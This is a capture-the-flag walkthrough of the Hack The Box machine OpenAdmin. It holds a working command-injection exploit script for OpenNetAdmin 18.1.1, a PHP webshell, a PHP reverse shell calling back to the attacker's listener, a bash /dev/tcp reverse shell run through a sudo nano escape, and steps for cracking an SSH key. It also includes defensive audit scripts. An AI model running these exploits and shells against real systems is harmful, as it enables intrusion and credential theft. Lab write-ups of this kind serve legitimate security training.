Hackthebox Openadmin writeup
Information@openadmin:~$
Column | Details |
---|---|
Name | OpenAdmin |
IP | 10.10.10.171 |
Points | 20 |
OS | Linux |
Difficulty | Easy |
Creator | dmw0ng |
Out On | 4 Jan 2020 |
Retired on | 2 May 2020 |
Brief@openadmin:~$
Gobuster reveals a directory called music, which hosts an OpenNetAdmin 18.1.1 install under /ona. There is a public exploit for that version (a command injection in the xajax ping/tooltips handler), and it gives an initial shell as www-data. The file database_settings.inc.php contains the database password, which is reused as the SSH password of the user jimmy. There are two ways to get a shell as joanna. First, a service on a local high port serves the content of /var/www/internal; its main.php reads joanna's private SSH key, and because the redirect for unauthenticated users is never followed by an exit, a plain request to that port's main.php returns her encrypted id_rsa. Cracking the key's passphrase with john lets us log in as joanna. Second, jimmy has read and write access to the internal directory while the service runs as joanna, so dropping a .php reverse shell there and requesting it gives a shell as joanna. Once logged in as joanna over SSH, sudo lets us run nano on /opt/priv as root, and nano's command-execution feature turns that into a root shell.
Summary
- Gobuster scan reveals the dir music
- The /ona page reveals the version of the OpenNetAdmin portal, which is vulnerable to RCE
- Exploiting the portal to get an initial shell as www-data
- The file database_settings.inc.php contains the password for user jimmy
- Login as jimmy
- There is a high port running locally which is serving the content of the internal dir
- The file main.php has the code to read the private SSH key of user joanna
- We have read and write permission to the dir internal
- The first way: make a request to /main.php, which gives us the encrypted id_rsa
- Use ssh2john to convert the id_rsa into a john-crackable hash
- After that we get the passphrase of id_rsa and log in as joanna
- The second way: make an executable file with rev-shell code in it
- Make a request to this file and you get a connection back on your listener
- Got user.txt
- sudo -l tells us that we can edit a file called /opt/priv as root using nano
- Executing commands in nano to get a root shell
- Got root.txt
Pwned
For some really cool writeups follow my brother http://www.whatinfotech.com/
Recon
Nmap
```text
➜ openadmin nmap -sC -sV -T4 -oA scans/nmap.full -p- -v openadmin.htb
# Nmap 7.80 scan initiated Fri May 1 11:44:03 2020 as: nmap -sC -sV -T4 -oA scans/nmap.full -p- -v openadmin.htb
Failed to resolve "nmap.full".
Nmap scan report for openadmin.htb (10.10.10.171)
Host is up (0.27s latency).
Not shown: 65510 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 4b:98:df:85:d1:7e:f0:3d:da:48:cd:bc:92:00:b7:54 (RSA)
| 256 dc:eb:3d:c9:44:d1:18:b1:22:b4:cf:de:bd:6c:7a:54 (ECDSA)
|_ 256 dc:ad:ca:3c:11:31:5b:6f:e6:a4:89:34:7c:9b:e5:50 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
| http-methods:
|_ Supported Methods: POST OPTIONS HEAD GET
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri May 1 11:55:17 2020 -- 1 IP address (1 host up) scanned in 673.78 seconds
```
Only two ports are open: 22 (SSH) and 80 (HTTP), so we focus on port 80.
Port-80
The page is the default Apache page, so the real content must live somewhere else; time to brute-force directories.
Gobuster results
```text
➜ ~prashant gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -r -k -x "txt,html,php,asp,aspx,jpg" -u http://openadmin.htb
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://openadmin.htb
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Extensions: txt,html,php,asp,aspx,jpg
[+] Follow Redir: true
[+] Timeout: 10s
===============================================================
2020/05/01 17:35:23 Starting gobuster
===============================================================
/index.html (Status: 200)
/music (Status: 200)
/artwork (Status: 200)
```
I got two directories, music and artwork. The artwork directory has literally nothing of interest on it, so I switched to music.
Exploiting openadmin portal
There is a login tab on the home page of the music dir. It points to /ona, and that page shows the name and version of the portal: the title is OpenNetAdmin and the version is 18.1.1. Exploit-DB has a public exploit for this version: the ping tooltip handler hands the ip xajax argument to a shell without sanitising it, so a ; in that value runs arbitrary commands as the web server user. I copied the exploit and modified it slightly:
```bash
#!/bin/bash
# Command injection in OpenNetAdmin 18.1.1: the 'ip' value of the xajax
# tooltips/ping call is spliced into a shell command server-side.
# 'ip=>;<cmd>' terminates that command and runs ours; the BEGIN/END
# markers let sed cut our output out of the HTML response.
# Note: $cmd is sent unencoded, so '&' (splits parameters), '+' (becomes
# a space) and '%' (decoded as an escape) will break a command.
URL="http://openadmin.htb/ona/"
while true;do
echo -n "$ "; read cmd
curl --silent -d "xajax=window_submit&xajaxr=1574117726710&xajaxargs[]=tooltips&xajaxargs[]=ip%3D%3E;echo \"BEGIN\";${cmd};echo \"END\"&xajaxargs[]=ping" "${URL}" | sed -n -e '/BEGIN/,/END/ p' | tail -n +2 | head -n -1
done
```
The only change from the public exploit is the URL variable. Now it's time to run it.
Got shell as www-data
```text
➜ openadmin ./exploit.sh
$ whoami
www-data
$ hostname
openadmin
$
```
After some manual enumeration I found a file called database_settings.inc.php in local/config (paths are relative to the ONA install directory, since every command is a fresh request started from there):

```text
$ ls local/config
database_settings.inc.php
motd.txt.example
run_installer
$
```
```text
$ cat local/config/database_settings.inc.php
<?php
$ona_contexts=array (
'DEFAULT' =>
array (
'databases' =>
array (
0 =>
array (
'db_type' => 'mysqli',
'db_host' => 'localhost',
'db_login' => 'ona_sys',
'db_passwd' => 'n1nj4W4rri0R!',
'db_database' => 'ona_default',
'db_debug' => false,
),
),
'description' => 'Default data context',
'context_color' => '#D3DBFF',
),
);
```
We got a password here: n1nj4W4rri0R!. It is the ONA database password, but it may belong to a local user as well. There are two users in /home:
```text
$ ls -la /home
total 16
drwxr-xr-x 4 root root 4096 Nov 22 18:00 .
drwxr-xr-x 24 root root 4096 Nov 21 13:41 ..
drwxr-x--- 5 jimmy jimmy 4096 Nov 22 23:15 jimmy
drwxr-x--- 6 joanna joanna 4096 Nov 28 09:37 joanna
$
```
I confirmed that the password belongs to user jimmy by logging in over SSH: the application's database password is reused for a local account.
```text
➜ openadmin sshpass -p 'n1nj4W4rri0R!' ssh jimmy@openadmin.htb
Welcome to Ubuntu 18.04.3 LTS (GNU/Linux 4.15.0-70-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Fri May 1 13:17:15 UTC 2020
System load: 0.0 Processes: 124
Usage of /: 49.9% of 7.81GB Users logged in: 2
Memory usage: 21% IP address for ens160: 10.10.10.171
Swap usage: 0%
* Canonical Livepatch is available for installation.
- Reduce system reboots and improve kernel security. Activate at:
https://ubuntu.com/livepatch
41 packages can be updated.
12 updates are security updates.
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings
Last login: Fri May 1 10:59:39 2020 from 10.10.16.81
jimmy@openadmin:~$
```
And I am jimmy now.
Privilege-escalation@joanna:~$
After various enumeration steps I got to know about a dir called internal in /var/www, and there is a high port, 52846, listening on localhost only:
```text
jimmy@openadmin:~$ ss -nlt
State Recv-Q Send-Q Local Address:Port Peer Address:Port
LISTEN 0 128 127.0.0.1:52846 0.0.0.0:*
```
curl is installed on the box, so I can request 127.0.0.1:52846 directly:
```text
jimmy@openadmin:~$ curl 127.0.0.1:52846
<?
// error_reporting(E_ALL);
// ini_set("display_errors", 1);
?>
<html lang = "en">
<head>
<title>Tutorialspoint.com</title>
<link href = "css/bootstrap.min.css" rel = "stylesheet">
<style>
body {
padding-top: 40px;
padding-bottom: 40px;
background-color: #ADABAB;
}
.form-signin {
max-width: 330px;
padding: 15px;
margin: 0 auto;
color: #017572;
}
.form-signin .form-signin-heading,
.form-signin .checkbox {
margin-bottom: 10px;
}
.form-signin .checkbox {
font-weight: normal;
}
.form-signin .form-control {
position: relative;
height: auto;
-webkit-box-sizing: border-box;
-moz-box-sizing: border-box;
box-sizing: border-box;
padding: 10px;
font-size: 16px;
}
.form-signin .form-control:focus {
z-index: 2;
}
.form-signin input[type="email"] {
margin-bottom: -1px;
border-bottom-right-radius: 0;
border-bottom-left-radius: 0;
border-color:#017572;
}
.form-signin input[type="password"] {
margin-bottom: 10px;
border-top-left-radius: 0;
border-top-right-radius: 0;
border-color:#017572;
}
h2{
text-align: center;
color: #017572;
}
</style>
</head>
<body>
<h2>Enter Username and Password</h2>
<div class = "container form-signin">
<h2 class="featurette-heading">Login Restricted.<span class="text-muted"></span></h2>
</div> <!-- /container -->
<div class = "container">
<form class = "form-signin" role = "form"
action = "/index.php" method = "post">
<h4 class = "form-signin-heading"></h4>
<input type = "text" class = "form-control"
name = "username"
required autofocus></br>
<input type = "password" class = "form-control"
name = "password" required>
<button class = "btn btn-lg btn-primary btn-block" type = "submit"
name = "login">Login</button>
</form>
</div>
</body>
</html>
```
The file being served is /index.php from /var/www/internal. (The first `<? ... ?>` block comes back verbatim because short open tags are not enabled on this PHP, while `<?php` blocks are executed.) First we need to find out which user the service runs as. There are three files in the dir:
```text
jimmy@openadmin:/var/www/internal$ ls -la
total 20
drwxrwx--- 2 jimmy internal 4096 May 1 13:26 .
drwxr-xr-x 4 root root 4096 Nov 22 18:15 ..
-rwxrwxr-x 1 jimmy internal 3229 Nov 22 23:24 index.php
-rwxrwxr-x 1 jimmy internal 185 Nov 23 16:37 logout.php
-rwxrwxr-x 1 jimmy internal 339 Nov 23 17:40 main.php
```
I have read and write permission in the internal dir (jimmy owns it, and the internal group has rwx on it), so I can create a .php file that executes whatever is passed in the cmd parameter:

```php
<?php echo "<pre>"; system($_GET['cmd']); ?>
```

```text
jimmy@openadmin:/var/www/internal$ echo '<?php echo "<pre>"; system($_GET['cmd']); ?>' >> test.php
jimmy@openadmin:/var/www/internal$ curl 127.0.0.1:52846/test.php?cmd=whoami
<pre>joanna
```
And here we go: we just confirmed that the service runs as joanna. One quoting note on the echo above: the inner 'cmd' quotes terminate the single-quoted shell string, so the file on disk actually contains `$_GET[cmd]`. PHP 7 treats the bare word as the string 'cmd' (with a notice), which is why it still works; on PHP 8 that is a fatal error, so write `$_GET["cmd"]` inside the single quotes if you want it clean. There are two ways to get a shell as joanna, as far as I did it.
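Both routes to joanna exist only because of a permission mismatch: the PHP under /var/www/internal executes as joanna, but the directory and its files are owned by jimmy and group-writable by internal, so jimmy can drop code that runs as joanna. As an added example (not part of the writeup), here is a small audit that walks a docroot and reports every path some user other than the service account could modify. The fixture it builds is constructed to mirror the ls -la above, and because the script is not running as joanna, "the service account" is simulated as the current uid plus one.

```python
"""Audit a web root for paths that a user other than the service account can write.

Added example, not the writeup's code. A docroot writable by anyone who is
not the account the interpreter runs as is a local code-execution path.
Checks are mode/owner based: world-writable, group-writable (any member of
that group may write, not only the service user) or owner-writable with an
owner that is not the service uid.
"""
import os
import shutil
import stat
import tempfile

LISTING = ("index.php", "logout.php", "main.php")   # files from the ls -la above


def writable_by_other(path: str, service_uid: int) -> bool:
    """True if some local user other than service_uid could write `path`."""
    st = os.lstat(path)
    if stat.S_ISLNK(st.st_mode):
        return False            # the link target is visited on its own
    mode = st.st_mode
    if mode & stat.S_IWOTH:
        return True
    if mode & stat.S_IWGRP:
        return True             # other members of st_gid (jimmy, here) can write
    return bool(mode & stat.S_IWUSR) and st.st_uid != service_uid


def audit_docroot(docroot: str, service_uid: int) -> list:
    """Return sorted docroot-relative paths (dirs and files) writable by others."""
    flagged = set()
    for dirpath, _dirnames, filenames in os.walk(docroot):
        if writable_by_other(dirpath, service_uid):
            flagged.add(os.path.relpath(dirpath, docroot))
        for name in filenames:
            full = os.path.join(dirpath, name)
            if writable_by_other(full, service_uid):
                flagged.add(os.path.relpath(full, docroot))
    return sorted(flagged)


def _make_docroot(dir_mode: int, file_mode: int) -> str:
    """Constructed fixture: a temp docroot laid out like /var/www/internal."""
    root = tempfile.mkdtemp(prefix="internal-")
    for name in LISTING:
        path = os.path.join(root, name)
        with open(path, "w") as fh:
            fh.write("<?php // placeholder ?>\n")
        os.chmod(path, file_mode)
    os.chmod(root, dir_mode)
    return root


def demo_as_listed() -> list:
    """drwxrwx--- dir, -rwxrwxr-x files, service uid != owner: everything is flagged."""
    root = _make_docroot(0o770, 0o775)
    try:
        # simulate "owned by jimmy, executed as joanna" with a different uid
        return audit_docroot(root, os.getuid() + 1)
    finally:
        shutil.rmtree(root)


def demo_hardened() -> list:
    """Same layout, 0750/0640 and owned by the service account: nothing is flagged."""
    root = _make_docroot(0o750, 0o640)
    try:
        return audit_docroot(root, os.getuid())
    finally:
        shutil.rmtree(root)


if __name__ == "__main__":
    print("as listed:", demo_as_listed())   # ['.', 'index.php', 'logout.php', 'main.php']
    print("hardened :", demo_hardened())    # []
```

The check answers one question only, "can someone other than the service account write here"; the stricter policy that the service account should not be able to modify its own code either is a separate control.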
1st method
Grabbing the id_rsa using main.php. The content of main.php is the following:
```php
<?php session_start(); if (!isset ($_SESSION['username'])) { header("Location: /index.php"); };
# Open Admin Trusted
# OpenAdmin
$output = shell_exec('cat /home/joanna/.ssh/id_rsa');
echo "<pre>$output</pre>";
?>
<html>
<h3>Don't forget your "ninja" password</h3>
Click here to logout <a href="logout.php" tite = "Logout">Session
</html>
```
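The bug in main.php is a classic one: the unauthenticated branch sends a Location header but never calls exit(), so PHP keeps executing, shell_exec dumps the key and it ends up in the body of the 302 response. As an added example (not from the writeup), here is a regex-based triage pass over PHP source that flags Location redirects not followed by exit or die; the two PHP samples inside it are a constructed copy of the main.php above and the corrected control flow.

```python
"""Flag PHP 'Location:' redirects that are not followed by exit/die.

Added example, not part of the writeup. This is a regex triage pass, not a
PHP parser: after each header("Location: ...") call it skips ';', '}',
whitespace and // or # comments, and requires the next statement to start
with exit or die. Nested parentheses inside the header() call are not handled.
"""
import re

HEADER_RE = re.compile(r"""header\s*\(\s*['"]Location:""", re.I)
STOP_RE = re.compile(r"^(?:exit|die)\b", re.I)           # exit; exit(); die('...')
SKIP_RE = re.compile(r"^[\s;}]*(?:(?://|#)[^\n]*\n[\s;}]*)*")


def unterminated_redirects(php_source: str) -> list:
    """Return 1-based line numbers of Location redirects after which code keeps running."""
    findings = []
    for m in HEADER_RE.finditer(php_source):
        close = php_source.find(")", m.end())            # end of the header(...) call
        if close < 0:
            continue
        rest = php_source[close + 1:]
        rest = rest[SKIP_RE.match(rest).end():]
        if rest.strip() and not STOP_RE.match(rest):
            findings.append(php_source.count("\n", 0, m.start()) + 1)
    return findings


# Constructed sample: the main.php served on port 52846, as shown above.
VULNERABLE = r'''<?php session_start(); if (!isset ($_SESSION['username'])) { header("Location: /index.php"); };
# Open Admin Trusted
# OpenAdmin
$output = shell_exec('cat /home/joanna/.ssh/id_rsa');
echo "<pre>$output</pre>";
?>'''

# The control-flow fix: exit right after the redirect. Serving a private key
# from a web page is still a terrible idea; this only closes the auth bypass.
FIXED = r'''<?php
session_start();
if (!isset($_SESSION['username'])) {
    header("Location: /index.php");
    exit;
}
$output = shell_exec('cat /home/joanna/.ssh/id_rsa');
echo "<pre>$output</pre>";
?>'''

if __name__ == "__main__":
    print("vulnerable:", unterminated_redirects(VULNERABLE))   # [1]
    print("fixed     :", unterminated_redirects(FIXED))        # []
```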
The unauthenticated branch only sends a Location header and never exits, so the key dump below it still runs. Making a request to main.php, with no session at all:
```text
jimmy@openadmin:/var/www/internal$ curl 127.0.0.1:52846/main.php
<pre>-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,2AF25344B8391A25A9B318F3FD767D6D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-----END RSA PRIVATE KEY-----
</pre><html>
<h3>Don't forget your "ninja" password</h3>
Click here to logout <a href="logout.php" tite = "Logout">Session
</html>
```
We got joanna's encrypted private SSH key (the DEK-Info header shows it is AES-128-CBC, protected by a passphrase, and the page also drops a "ninja" password hint). Save the key block locally as joanna-id_rsa.
Cracking the encrypted id_rsa using john
First we need to turn the encrypted id_rsa into a hash john can crack. ssh2john.py does that; it ships with John the Ripper (/usr/share/john/ssh2john.py on Kali).
```text
➜ openadmin python2 /usr/share/john/ssh2john.py joanna-id_rsa >> hash-id_rsa
```
Now it's time for john to make some noise.
```text
➜ openadmin john hash-id_rsa -w=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Will run 4 OpenMP threads
Note: This format may emit false positives, so it will keep trying even after
finding a possible candidate.
Press 'q' or Ctrl-C to abort, almost any other key for status
bloodninjas (joanna-id_rsa)
Warning: Only 2 candidates left, minimum 4 needed for performance.
1g 0:00:00:07 DONE (2020-05-01 20:14) 0.1371g/s 1967Kp/s 1967Kc/s 1967KC/sa6_123..*7¡Vamos!
Session completed
```
We got bloodninjas as the cracked passphrase. John warns that this format can emit false positives, so the real confirmation is logging in with it. Now it's time to log in using the key (ssh refuses a private key that is readable by others, hence the chmod 600):
```text
➜ openadmin chmod 600 joanna-id_rsa
➜ openadmin ssh -i joanna-id_rsa joanna@openadmin.htb
Enter passphrase for key 'joanna-id_rsa':
Welcome to Ubuntu 18.04.3 LTS (GNU/Linux 4.15.0-70-generic x86_64)
Last login: Fri May 1 11:31:30 2020 from 10.10.16.81
joanna@openadmin:~$
```
And I am in as joanna.
2nd method
By creating a new PHP file containing a reverse shell. Since the service runs as joanna and I have read and write permission in the internal dir, I can simply create a .php file that connects back to me when I request it. I made 0xprashant.php containing a standard PHP reverse shell; a minimal equivalent, pointing at my listener (10.10.14.25:1234) and running the same uname -a; w; id preamble that shows up in the listener output below, is:

```php
<?php
// Reverse shell: connect back to the attacker's listener and hand it an
// interactive bash, with stdin/stdout/stderr all wired to the socket.
$sock = fsockopen("10.10.14.25", 1234);
$proc = proc_open("uname -a; w; id; /bin/bash -i",
                  array(0 => $sock, 1 => $sock, 2 => $sock), $pipes);
?>
```
And I make the request:

```text
jimmy@openadmin:/var/www/internal$ curl 127.0.0.1:52846/0xprashant.php
```

And on my netcat listener I got a shell as joanna:
```text
➜ prashant nc -nlvp 1234
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::1234
Ncat: Listening on 0.0.0.0:1234
Ncat: Connection from 10.10.10.171.
Ncat: Connection from 10.10.10.171:55726.
Linux openadmin 4.15.0-70-generic #79-Ubuntu SMP Tue Nov 12 10:36:11 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
14:00:00 up 8:44, 3 users, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
jimmy pts/0 10.10.14.25 13:57 8.00s 0.05s 0.00s curl 127.0.0.1:52846/0xprashant.php
jimmy pts/1 10.10.14.25 13:17 18:16 0.10s 0.10s -bash
joanna pts/2 10.10.14.25 13:49 2:19 0.05s 0.05s -bash
uid=1001(joanna) gid=1001(joanna) groups=1001(joanna),1002(internal)
bash: cannot set terminal process group (1050): Inappropriate ioctl for device
bash: no job control in this shell
joanna@openadmin:/$
```
Got user.txt

```text
joanna@openadmin:~$ cat user.txt
c9b-------------------------1b5f
joanna@openadmin:~$
```
Privilege-escalation@root:~$
After getting a full SSH shell as joanna, I ran sudo -l to check whether I may run anything as root:
```text
joanna@openadmin:~$ sudo -l
Matching Defaults entries for joanna on openadmin:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User joanna may run the following commands on openadmin:
(ALL) NOPASSWD: /bin/nano /opt/priv
```
So I can edit the file /opt/priv with nano as root, without a password. GTFOBins lists nano: open the file as root with sudo, press Ctrl+R (read file) and then Ctrl+X (execute command), and nano runs whatever you type, as root. Restricting the rule to /opt/priv does not help, because the command nano executes has nothing to do with the file being edited. The command I ran was a bash reverse shell back to my listener on port 2345 (for example the usual `bash -c 'bash -i >& /dev/tcp/ATTACKER_IP/2345 0>&1'` form, with your own IP in place of ATTACKER_IP).
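Spotting this class of sudo rule is mechanical, so here it is as code: an added example (not from the writeup) that parses `sudo -l` output in the format shown above into (runas, nopasswd, command) tuples and flags commands whose binary is an editor, pager or similar tool with a known way to run commands once started as root. The sample text is a constructed copy of the joanna output; the escape table is a short hand-picked subset of GTFOBins, not an exhaustive list.

```python
"""Triage `sudo -l` output for binaries with a known shell/command escape.

Added example, not part of the writeup. The rule regex handles the common
"(runas) TAG: TAG: command" shape, including "(root : root)" run-as specs
and tags such as NOPASSWD:, SETENV:, NOEXEC:.
"""
import re

# binary -> how to get a command out of it once it runs as root (GTFOBins)
SHELL_ESCAPES = {
    "nano": "Ctrl+R, Ctrl+X, then type the command",
    "vim": ":!/bin/sh",
    "vi": ":!/bin/sh",
    "less": "!/bin/sh",
    "more": "!/bin/sh",
    "man": "!/bin/sh",
    "find": ". -exec /bin/sh \\; -quit",
}

# "(ALL) NOPASSWD: /bin/nano /opt/priv"  ->  runas, tags, command
RULE_RE = re.compile(
    r"^\s*\((?P<runas>[^)]+)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmd>.+?)\s*$")

# Constructed sample: the sudo -l output from the joanna shell above.
SAMPLE = """\
Matching Defaults entries for joanna on openadmin:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin\\:/snap/bin

User joanna may run the following commands on openadmin:
    (ALL) NOPASSWD: /bin/nano /opt/priv
"""


def parse_sudo_l(text: str) -> list:
    """Return [(runas, nopasswd, command), ...] from `sudo -l` output."""
    rules, in_block = [], False
    for line in text.splitlines():
        if "may run the following commands" in line:
            in_block = True          # rules follow this header line
            continue
        if not in_block:
            continue                 # skip the Defaults block
        m = RULE_RE.match(line)
        if m:
            rules.append((m.group("runas").strip(),
                          "NOPASSWD:" in m.group("tags"),
                          m.group("cmd")))
    return rules


def assess(text: str) -> list:
    """Return (binary, command, runas, nopasswd, escape) for every escapable rule."""
    findings = []
    for runas, nopasswd, cmd in parse_sudo_l(text):
        binary = cmd.split()[0].rsplit("/", 1)[-1]   # /bin/nano -> nano
        if binary in SHELL_ESCAPES:
            findings.append((binary, cmd, runas, nopasswd, SHELL_ESCAPES[binary]))
    return findings


if __name__ == "__main__":
    for binary, cmd, runas, nopasswd, escape in assess(SAMPLE):
        auth = "no password" if nopasswd else "password required"
        print(f"{cmd}  (as {runas}, {auth}) -> {binary}: {escape}")
```

Arguments in the rule (here /opt/priv) are reported but deliberately not used to downgrade a finding: for editors and pagers the escape does not depend on which file was named.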
```text
joanna@openadmin:~$ sudo nano /opt/priv
```
Inside nano, Ctrl+R opens the "File to insert" prompt, and pressing Ctrl+X at that prompt switches it to "Command to execute". Type the reverse shell command, hit Enter, and on the netcat listener we get a shell as root:
```text
➜ prashant nc -nlvp 2345
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::2345
Ncat: Listening on 0.0.0.0:2345
Ncat: Connection from 10.10.10.171.
Ncat: Connection from 10.10.10.171:54498.
root@openadmin:~#
```
Got root.txt

```text
root@openadmin:/root# cat root.txt
cat root.txt
2f---------------------------b561
root@openadmin:/root#
```
And we pwned it …….
If you liked the writeup, support a poor student on BuyMeACoffee to get the OSCP cert.
Resources
Topic | URL |
---|---|
OpenNetAdmin 18.1.1 exploit | Exploit-DB: OpenNetAdmin 18.1.1 - Remote Code Execution |
GTFOBins: nano | https://gtfobins.github.io/gtfobins/nano/ |